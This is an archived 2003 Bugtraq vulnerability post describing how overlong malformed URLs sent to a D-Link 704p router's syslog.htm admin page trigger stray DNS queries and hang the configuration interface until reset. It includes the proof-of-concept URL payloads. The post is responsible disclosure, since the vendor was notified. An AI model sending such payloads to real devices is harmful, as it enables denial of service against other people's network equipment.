Buffer Overflow? Local Malformed URL attack on D-Link 704p router
From: Chris R (admin_at_securityindex.net)
Date: 05/26/03
- Previous message: Michael Nelson: "Re: bazarr CALL POLICE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 May 2003 05:53:41 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
My home network uses a small 4 port broadband Dlink router (704p) The
firmware was updated a week ago.
The following malformed URL's cause odd behavior in the router. Pointing
your browser (like most routers) to the gateways internal IP address you
get a web interface for administering your router.
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This URL caused the router to do a DNS query on:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net
"@xxxx.xx.comcast.net" is the trailing end of my hostname (i replaced the
real trailing host name with x's as to not give up my location! heh)
Subsequently there was a DNS response "no such name"
Enough of these malformed URLS causes the DNS server to DoS the router for
a short time because a DNS response packet is much larger then a DNS query
packet.
This URL also caused an error in the routers log file page, the URL
made the page look odd. This router uses CSS to display its tabs and log
file (syslog.htm). Some of the HTML was visible within the CSS that were
now repeating across the page. I took a screen shot and uploaded it to my
webspace.
http://www.securityindex.net/router.JPG
--- http://192.168.0.1/syslog.htm? D=......................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... ........................................................................... .................... This malformed URL caused the router to stop responding. Requesting this url over and over will eventually render the router useless until reset. You can still access the internet after sending this url once but the routers configuration page does not respond until you reset the router. --> i sent an email to dlink containing a copy of this post. Thanx --> --chris www.securityindex.net -apex security group-
- Previous message: Michael Nelson: "Re: bazarr CALL POLICE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
